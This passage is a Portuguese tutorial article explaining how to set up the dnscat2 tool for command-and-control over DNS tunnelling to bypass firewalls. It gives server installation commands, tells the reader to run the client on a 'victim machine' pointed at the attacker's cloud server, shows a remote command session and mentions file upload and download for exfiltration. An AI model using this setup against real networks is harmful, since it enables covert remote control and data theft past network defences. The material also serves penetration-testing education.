Bypass de firewall com tunelamento por DNS

Como utilizar uma ferramenta para Command & Control através de tunelamento DNS para burlar firewalls com regras para requisição de DNS liberadas.

[ Hits: 14.814 ]

Por: Luiz Vieira em 22/02/2016 | Blog: http://hackproofing.blogspot.com/


Estrutura cliente/servidor



A primeira coisa que precisamos ter em mente é que essa ferramenta funciona no esquema de cliente/servidor. Portanto, é importante que tenha uma máquina virtual na cloud para servir de local para hospedar o server da ferramenta, como um droplet no Digital Ocean, por exemplo.

Após o deployment de sua VM na cloud, basta baixar e instalar o dnscat2 server, com os seguintes comandos:

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install


E após instalar o server, para ativá-lo basta usar o comando abaixo, a partir de dentro do diretório dnscat2/server:

# ruby ./dnscat2.rb

Com isso feito, basta agora executar o cliente na máquina vítima, ou de sua máquina dentro da rede de onde quer fazer a conexão, usando simplesmente o parâmetro "--host [IP-do-server]". Caso a máquina de onde esteja rodando o cliente seja Windows, basta baixar o binário pré-compilado do site do desenvolvedor:
e executá-lo com o mesmo parâmetro (--host [IP-do-server]).

Assim que o cliente for executado, poderá perceber que no server você receberá o laerta de uma nova conexão existente com um cliente, como abaixo:

# ruby ./dnscat2.rb
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)
dnscat2> New session established: 1258
dnscat2>
O que é mais interessante, é que a partir do server você poderá interagir com o cliente a qualquer momento, executando comandos e carregando aplicações definindo com qual sessão deseja interagir, como por exemplo:
dnscat2> session -i 1258
Welcome to a command session!
Use 'help' for a list of commands or ^z for the main menu
dnscat [command: 1258]> exec notepad.exe
Sent request to execute
dnscat [command: 1258]>


dnscat2 também suporta outros comandos, como download e upload, para exfiltragem de informações por exemplo.

Página anterior     Próxima página

Páginas do artigo
   1. Introdução
   2. Estrutura cliente/servidor
   3. Usando um servidor DNS específico
Outros artigos deste autor

PNL para Hacking

Certificações em Segurança: para qual estudar?

Análise de Malware em Forense Computacional

Segurança da Informação no Brasil, qual é nossa realidade?

Distribuição CAINE Linux para forense digital: em Live-CD, pendrive, máquina virtual ou direto em seu Ubuntu 10.04

Leitura recomendada

Integração de servidores Linux com Active Directory

Criptografia com Loop-AES

Firefox 2 e seu recurso de proteção contra Web Phishing

Snort + ACID + MySQL no Slackware

PaX: Solução eficiente para segurança em Linux

  
Comentários
[1] Comentário enviado por cROMADO em 26/02/2016 - 04:12h

Interessante.

[2] Comentário enviado por SiLenT-MaN em 03/03/2016 - 10:15h

Não sei se funcionaria em layer7.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts